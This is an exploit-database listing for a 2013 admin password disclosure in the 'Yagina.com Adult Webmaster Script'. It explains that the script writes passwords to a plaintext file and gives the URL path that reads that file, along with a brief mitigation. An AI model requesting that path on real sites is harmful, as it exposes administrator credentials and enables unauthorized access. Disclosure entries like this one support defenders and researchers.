header-logo
Suggest Exploit
vendor:
Adult Webmaster Script
by:
Dshellnoi Unix
8,8
CVSS
HIGH
Password Disclosure
200
CWE
Product Name: Adult Webmaster Script
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2013

Yagina.com Adult Webmaster Script Admin Password Disclosure

The failure comes from saving passwords in a text file with php fwrite function, that can be read by the url

Mitigation:

Ensure that passwords are not stored in plaintext files and are encrypted.
Source

Exploit-DB raw data:

# Exploit Title: Yagina.com Adult Webmaster Script Admin  Password Disclosure
# Category:webapps
# Description software : software website for webmasters promoting adult companies through referrals
# Date: 21-1-2013
# Exploit Author: Dshellnoi Unix 
# Vendor Homepage: http://www.yagina.com/
# Software Link:  http://sourceforge.net/projects/adultweb/?source=dlp

#-----------------------------VULNERABIlITY DESCRIPTION------------------------------------#
The failure comes from saving passwords in a text file with php fwrite function,
 that can be read by the url

#---------------------------------EXPLOIT---------------------------------------------------#
#exploit
http://[url]/admin/userpwdadfasdfre.txt
#-------------------------------------------------------------------------------------------#
#Thanks to : Luisfer ,Ivan sanchez, Juan carlos garcia